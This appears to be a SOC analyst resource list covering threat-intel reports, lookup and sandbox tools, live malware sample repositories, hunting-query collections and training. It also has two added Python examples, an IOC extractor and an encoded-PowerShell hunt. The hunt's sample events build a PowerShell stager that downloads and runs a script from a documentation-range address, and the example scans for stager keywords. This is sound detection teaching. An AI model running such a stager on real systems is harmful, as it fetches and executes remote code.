Starting a career as a SOC analyst, or simply looking for a list of the tools most used in the field? This repository is for you: whether you work at level 1 or in a more specialised role, you will find resources here to make the job easier. Remember that the priority is to detect and identify the threat correctly, so use everything you have at hand and head off the crisis.
The repository is split into several parts: threat reports for monitoring, the list of tools used to qualify malicious activity, and finally the query collections you need to threat hunt properly. News sites and courses are also included so you can keep training between incidents, when you have the time.
Threat reports & intelligence | Description |
---|---|
APT_CyberCriminal | Repository of publicly available documents and notes related to APT activity, sorted by year. |
MITRE ATT&CK | Knowledge base of adversary tactics and techniques, including the APT group and campaign lists |
Ransomwatch | Tracks ransomware groups and their leak-site activity across the web |
FBI Internet Crime Report | Annual IC3 report summarising the cyber incidents and losses reported to the FBI during the year |
FBI Fraud Report | The Internet Crime Complaint Center (IC3) is the US central hub for reporting cybercrime; it is run by the FBI, the lead federal agency for investigating it |
CISA Top Vulnerabilities | CISA advisory on the vulnerabilities most routinely exploited in the wild, published to help network defenders prioritise vulnerability management |
Sophos Ransomware report | Sophos's annual report on ransomware attack rates, ransom payments and recovery costs |
SpyCloud Exposure report | Annual Identity Exposure Report covering data breach, malware and identity-theft trends observed in criminal markets |
NIST Cybersecurity | NIST's secure software development guidance, developed with software developers, service providers and users, and now mandatory for federal agency software acquisition and use |
Malware Traffic Analysis | This blog focuses on network traffic related to malware infections, mostly from Windows-based malware. |
ANSSI Cyber Threat | The French national agency's threat overview, reporting a steadily rising threat level against a backdrop of new geopolitical tensions and international events hosted in France |
Fortinet | Overview of the 20 most common types of cyber attack |
CrowdStrike | Overview of the 10 most common types of cyber attack |
Malwarebytes Labs | Ransomware review 2024 |
Analysis & reputation tool | Description |
---|---|
AbuseIPDB | Check an IP's reputation against community abuse reports and public feeds |
CriminalIP | IP and domain reputation checker that flags hosts seen in malware activity |
Shodan | Search engine for internet-exposed hosts: look up a hostname or IP to see its open ports, services and banners |
Netcraft | Historical analyser: find information about a website, its hosting and its DNS history |
UrlScan | Scan a URL to see what the page loads and whether it is linked to suspicious activity |
PaloAlto URL | Palo Alto Networks URL Filtering category and reputation lookup |
Joe Sandbox | Detonate your malware samples in a sandbox and observe their behaviour |
Yomi | Sandbox for analysing submitted malware samples |
VirusTotal | Look up a hash, file or URL and see how security vendors have classified it |
Hybrid Analysis | Another sandbox: detonate files and see whether they pose a risk |
DocGuard | Document analyser: malicious VBA macros, hidden scripts and similar |
MxToolBox | Check the reputation of a mail domain and its DNS records (MX, SPF, DKIM, DMARC) |
ThreatMiner | Pivot on an IOC (domain, IP, hash) and gather the related information |
CyberChef | Web app for building and running "recipes" of data-manipulation operations: encode, decode, compress, encrypt, analyse and transform data |
PcapTotal | Successor to PacketTotal with over 100,000 PCAP files in its repository; check whether malicious behaviour is present in a network capture |
MD5Center | Reverse an unsalted MD5 hash by lookup in precomputed tables (a salted hash will not be found here; use john or hashcat instead) |
SHA1Center | Same idea, for SHA-1 hashes |
PhishTank | Community-verified database of phishing URLs |
PulseDive | Centralised CTI lookup: information about malware, IPs, hashes and MITRE ATT&CK tags |
Censys | Internet-wide scan data to identify the exposures attackers are likely to exploit |
DNSDumpster | Powerful DNS and domain recon tool |
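Before pasting indicators into the lookup services above it helps to pull them out of the alert text cleanly. The following is an added example, not code from the original list: it refangs the defanged notation used in CTI reports (`hxxp://`, `[.]`, `[@]`), sorts hashes by algorithm from their hex length (32 = MD5, 40 = SHA-1, 64 = SHA-256, which also decides whether an MD5/SHA-1 lookup site or VirusTotal applies), drops file names that look like domains, and sets RFC 1918 addresses aside since they are not worth an external reputation query. The alert text is constructed for the example; the two hashes are those of the EICAR test file.

```python
"""IOC extraction for alert triage (added example, not from the original list)."""
import ipaddress
import re

# Defanged notation used in CTI reports; reverse it before any lookup.
_REFANG = (("hxxp", "http"), ("[.]", "."), ("(.)", "."), ("[:]", ":"), ("[@]", "@"))

# Tokens that look like domains but are file names (setup.exe, report.pdf).
_FILE_EXT = {"exe", "dll", "ps1", "bat", "vbs", "js", "lnk", "zip", "pdf",
             "doc", "docx", "xls", "xlsx", "txt", "log"}

# RFC 1918, loopback and link-local: internal, not worth an external reputation lookup.
_INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                  ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                   "127.0.0.0/8", "169.254.0.0/16")]

# Hash type is inferred from hex length: 32 = MD5, 40 = SHA-1, 64 = SHA-256.
_PATTERNS = {
    "url":    re.compile(r"\bhttps?://[^\s'\"<>]+", re.I),
    "email":  re.compile(r"\b[\w.+-]+@(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I),
    "domain": re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I),
    "ipv4":   re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "sha256": re.compile(r"\b[a-f0-9]{64}\b", re.I),
    "sha1":   re.compile(r"\b[a-f0-9]{40}\b", re.I),
    "md5":    re.compile(r"\b[a-f0-9]{32}\b", re.I),
}


def refang(text: str) -> str:
    """Turn hxxp://evil[.]example back into http://evil.example."""
    for defanged, clean in _REFANG:
        text = text.replace(defanged, clean)
    return text


def _classify_ip(addr: str):
    """Return 'ipv4', 'ipv4_internal', or None when the loose regex matched junk (999.1.1.1)."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return None
    return "ipv4_internal" if any(ip in net for net in _INTERNAL_NETS) else "ipv4"


def extract_iocs(text: str) -> dict:
    """Return {kind: sorted list of unique indicators} found in the refanged text."""
    text = refang(text)
    found = {kind: set() for kind in (*_PATTERNS, "ipv4_internal")}
    for kind, pattern in _PATTERNS.items():
        for match in pattern.findall(text):
            if kind == "ipv4":
                ip_kind = _classify_ip(match)
                if ip_kind:
                    found[ip_kind].add(match)
            elif kind == "domain":
                if match.rsplit(".", 1)[-1].lower() not in _FILE_EXT:
                    found[kind].add(match.lower())
            elif kind in ("md5", "sha1", "sha256"):
                found[kind].add(match.lower())   # normalise case before a hash lookup
            else:
                found[kind].add(match)
    return {kind: sorted(values) for kind, values in found.items()}


# Constructed alert text; 44d8... and 275a... are the EICAR test file hashes.
SAMPLE_ALERT = """\
Phishing mail from billing[@]invoice-portal[.]top to jdoe@corp.example
Link: hxxp://invoice-portal[.]top/dl/Invoice_0423.exe
Attachment Invoice_0423.exe md5 44d88612fea8a8f36de82e1278abb02f
sha256 275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f
Beacon to 203.0.113.45:443 via internal proxy 10.0.0.12
"""

if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE_ALERT).items():
        if values:
            print(f"{kind:14s} {', '.join(values)}")
```

Anything under `ipv4` and `url` goes to AbuseIPDB, urlscan or VirusTotal; the `md5` entry is the only one an MD5 lookup site can answer, while the SHA-256 is what you would search on VirusTotal or MalwareBazaar.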
Malware sample source | Description |
---|---|
MalwareDatabase | Malware sample repository |
VXunderground | Malware source code and samples, free online |
Malware-Feed | Repository and list of the most active malware families |
MalwareBazaar | Collect samples for your tests from abuse.ch's widely used sample database |
Malware-Sample | Another repository offering up-to-date samples |
theZoo | Active repository of live malware samples for analysis |
Handle these samples only inside an isolated lab: they are live malware, which is why most of these sources ship them in password-protected archives (commonly `infected`).
Query & hunting resource | Description |
---|---|
Sentinel & Defender KQL | Readable KQL queries anyone can reuse, intended to increase detection coverage over the logs of Microsoft security products |
Awesome KQL | Detection R&D repository created by the Cylaris Threat Research Group |
Sentinel Queries | Some tips, tricks and examples for using KQL with Microsoft Sentinel. |
Threat-Hunting-KQL | Repository for threat hunting and detection queries, tools, etc. |
Splunk Queries SOC | The most useful Splunk (SPL) queries for SOC analysts |
Splunk queries | Compilation of Splunk queries collected and used over time |
sserrato Splunk Queries | These are examples of queries I've run on Apache and Windows Server logs as part of a 2022 course on cybersecurity where I was using Splunk for SOC monitoring |
threathuntingspl | This is a repository to store Splunk code (SPL) and prototypes useful for building rules (correlation searches) and queries to find and hunt for malicious activity. |
ThreatHuntingWithSplunk | Splunk SPL queries that can be used to detect the latest vulnerability exploitation attempts |
IBM AQL | IBM documentation for Ariel Query Language (AQL), the query language of QRadar SIEM |
Explain Shell | Don't understand a shell command? Paste it here for an argument-by-argument breakdown |
zzzcodeai | Don't understand a piece of code? Specify the language and paste it here |
KQL for network OPS | Blog on querying data that contains IP addresses with KQL |
KQL for Sec OPS | Blog series on Kusto Query Language (KQL) for security operations |
FalconFriday | Microsoft Defender for Endpoint hunting queries to detect offensive techniques |
AzSentinelQueries | Sentinel hunting queries and analytics rules |
KQL-XDR-Hunting | "Out-of-the-box" KQL queries built from feedback, security blogs and new attacks to assist your threat hunting |
Advanced Hunting KQL | Collection of Microsoft 365 advanced hunting queries written in Kusto Query Language (KQL) |
Sekoia-io resources | IOCs, cyber threat intelligence material, hunting queries, detection rules, playbooks and more, to make the most of SEKOIA.IO XDR |
CrowdStrike community | Hunting guide for finding adversaries, suspicious activity, suspicious processes and vulnerabilities in Falcon telemetry using Falcon Long-Term Repository (FLTR) |
FortiSIEM | Documentation for FortiSOAR and FortiSIEM investigations |
SigmaDoc | Documentation for Sigma detection rules, the vendor-neutral rule format that converts into the SIEM query languages above |
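To show what the hunting queries collected above actually do, here is an added example (not code from any of the listed repositories) of one classic hunt, encoded PowerShell, written in plain Python so that it runs over constructed process-creation events instead of a SIEM. It keeps only `powershell.exe`/`pwsh.exe` launches, finds the `-e`/`-enc`/`-EncodedCommand` switch, decodes the base64 blob as UTF-16LE (the encoding PowerShell expects), and scores the result on keywords typical of download-and-execute stagers. The events, hostnames and the 203.0.113.45 address are all made up for the sample; `encode_command` exists only to build that sample the way an attacker's loader would.

```python
"""Toy encoded-PowerShell hunt over process events (added example, not from the listed repos)."""
import base64
import re

PS_IMAGES = {"powershell.exe", "pwsh.exe"}
# powershell.exe accepts -e, -ec, -enc and -EncodedCommand; longest alternative first.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Substrings worth a closer look, checked on the switches and on the decoded script.
SUSPICIOUS = ("downloadstring", "invoke-expression", "iex", "frombase64string",
              "-nop", "bypass", "hidden")


def encode_command(script: str) -> str:
    """Build an -EncodedCommand blob as PowerShell expects it: UTF-16LE, then base64.
    Used here only to construct the sample events."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script when cmdline carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # bad padding or not UTF-16: not a real blob
        return None


def hunt(events):
    """Return one hit per PowerShell event carrying an encoded command, highest score first."""
    hits = []
    for ev in events:
        if ev["image"].lower() not in PS_IMAGES:
            continue
        script = decode_encoded_command(ev["cmdline"])
        if script is None:
            continue
        # Drop the blob before keyword matching so base64 noise cannot produce false hits.
        switches = ENC_FLAG.sub(" ", ev["cmdline"])
        haystack = (switches + " " + script).lower()
        reasons = [kw for kw in SUSPICIOUS if kw in haystack]
        hits.append({"host": ev["host"], "user": ev["user"], "parent": ev["parent"],
                     "decoded": script, "reasons": reasons, "score": len(reasons)})
    return sorted(hits, key=lambda h: h["score"], reverse=True)


# Constructed events; 203.0.113.45 is a documentation address, not a real C2.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.45/a.ps1')"
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "jdoe", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"host": "WS01", "user": "jdoe", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc " + encode_command(STAGER)},
    {"host": "SRV02", "user": "svc_build", "parent": "cmd.exe", "image": "pwsh.exe",
     "cmdline": "pwsh.exe -e " + encode_command("Get-Date")},
    {"host": "SRV02", "user": "svc_build", "parent": "cmd.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c echo -enc QUJDREVGR0hJSktMTU5PUA=="},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f"{hit['host']} {hit['user']} parent={hit['parent']} "
              f"score={hit['score']} reasons={hit['reasons']}\n  {hit['decoded']}")
```

The Office parent (`winword.exe`) plus the decoded download-and-execute stager is what makes the second event the one to triage first; the `Get-Date` launch decodes cleanly but scores zero, which is why the hunt reports a score rather than alerting on the switch alone. In Defender's advanced hunting the same filter is a `DeviceProcessEvents` query on `FileName` and `ProcessCommandLine`, and the KQL collections above carry exactly that kind of rule.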
Live threat map | Description |
---|---|
Checkpoint | Check Point's live cyber-attack threat map |
Kaspersky | Kaspersky's real-time cyberthreat map |
Radware | Near real-time view of attacks as they occur, based on Radware's global threat-deception network and cloud event data |
Fortinet | Fortinet's live threat map |
Bitdefender | Bitdefender Advanced Threat Defense cyber map |
Training / certification | Description |
---|---|
RootMe | Train your hacking skills on a wide range of exercises and virtual environments |
HackTheBox | SOC Analyst path: core security monitoring and analysis concepts, plus the specialised tools, attack tactics and methodology used by adversaries |
TryHackMe | In the Junior Security Analyst role you act as a triage specialist, spending a significant portion of your time monitoring event logs and triaging alerts. |
Coursera | SOC analyst courses from IBM, Microsoft, Palo Alto and many other major players in the field |
LetsDefend | Hands-on blue-team training to develop the skills and experience for a job in cybersecurity |
ICSI | SOC analyst, network defence and pentesting courses, CREST-approved |
EC-Council CSA | Certified SOC Analyst, engineered for current and aspiring Tier I and Tier II SOC analysts to reach proficiency in entry-level and intermediate-level operations |
OffSec SOC-200 | Foundational Security Operations and Defensive Analysis (SOC-200): the foundations of cybersecurity defence |
Security Blue Team BTL1 | Blue Team Level 1, used around the world to train technical defenders in governments, CERTs, law enforcement, military units, MSSPs, financial institutions, critical national infrastructure and more |
PluralSight | Cyber defence analyst path: using defensive measures and information from a variety of sources to identify, analyse and report events that occur or might occur on the network |
Microsoft SC-200 | Security Operations Analyst: investigate, hunt for and mitigate threats using Microsoft Sentinel, Microsoft Defender for Cloud and Microsoft 365 Defender |
Splunk CCDA | Splunk Certified Cybersecurity Defense Analyst: validates the skills to start as a SOC analyst using Splunk analytics, threat hunting, risk-based alerting and industry best practices |
IBM SOCA | Intermediate-level certification for analysts with CompTIA cybersecurity knowledge and technical skills in IBM Security QRadar SIEM |
Cisco SOC | Free junior SOC analyst course from Cisco Skills for All |
CompTIA CySA+ | CompTIA Cybersecurity Analyst (CySA+) is a certification for professionals tasked with incident detection, prevention and response through continuous security monitoring. |
CompTIA Security+ | CompTIA Security+ is a global certification that validates the baseline skills necessary to perform core security functions and pursue an IT security career. |
News site | Description |
---|---|
TheHackerNews | Widely read cybersecurity publication with breaking news for information security professionals |
DarkReading | Cybersecurity news, trends and analysis: the latest threats, vulnerabilities, breaches and solutions for your organisation |
Cybersecurity Hub | Resource for the cyber security community: daily commentary, webinars, monthly events and market reports |
Cybersecurity News | Independent news platform covering ongoing threats, research papers, vulnerabilities, data breaches and more |
Cyware | Security news and alert feed from Cyware, whose platform aggregates security alerts and advisories for sharing between teams |
/r/cybersecurity | Subreddit for news, breaches, ransomware, tools, education, career advice and more |
InfoSecurity | Infosecurity Magazine: news, opinion, webinars and white papers on information and IT security |
CyberdefenseMag | Cyber Defense Magazine: security news outlet that also publishes contributed articles |
SecurityLedger | Independent security news website exploring the intersection of cyber security with business, commerce, politics and everyday life |
GBHackers | Daily cyber security and hacking news, technology updates and Kali Linux tutorials |
HackRead | News on technology, security, privacy, surveillance, cyberwarfare and cybercrime, plus first-hand hacking news |
Talos Intelligence | Cisco Talos, one of the largest commercial threat intelligence teams; its blog covers known and emerging threats backed by Cisco telemetry |
TheGuardian/Cyber | The Guardian's cybersecurity coverage |
ProofPointBlog | Proofpoint's blog: threat research, threat intelligence and breaking attack news |
/r/SecurityCareerAdvice | A place to connect those seeking to learn with those who have walked the path before; ask your cybersecurity career questions and mentors answer as they have time |
/r/netsec | Community of technical information security enthusiasts sharing and discussing the latest security content and news |
Related repository | Description |
---|---|
9QIX/HTB-SOCAnalystPrerequisites | This learning journey spans 173 sections over 12 days, comprising 350 required cubes, and covers fundamental IT and information security subjects: networking, Linux and Windows, basic programming and scripting, and assembly... |
SOC-Community/Awesome-SOC | A collection of documentation sources and field best practices for building and running a SOC (including a CSIRT) |
LetsDefend/awesome-soc-analyst | Useful resources for SOC analysts and SOC analyst candidates, maintained by LetsDefend |
awesome-list | Security lists for SOC/DFIR detections |
hslatman/awesome-threat-intelligence | A curated list of threat intelligence resources |
Certification-Training/CEHv12 | Study notes for the EC-Council Certified Ethical Hacker (CEH v12) exam by a3cipher |
FreeCybersecurityEbooks | Collection of free cybersecurity-related e-books available on KnowledgeHub |
awesome-list | Collection of detection lists, feeds and IOCs for SIEMs and firewalls |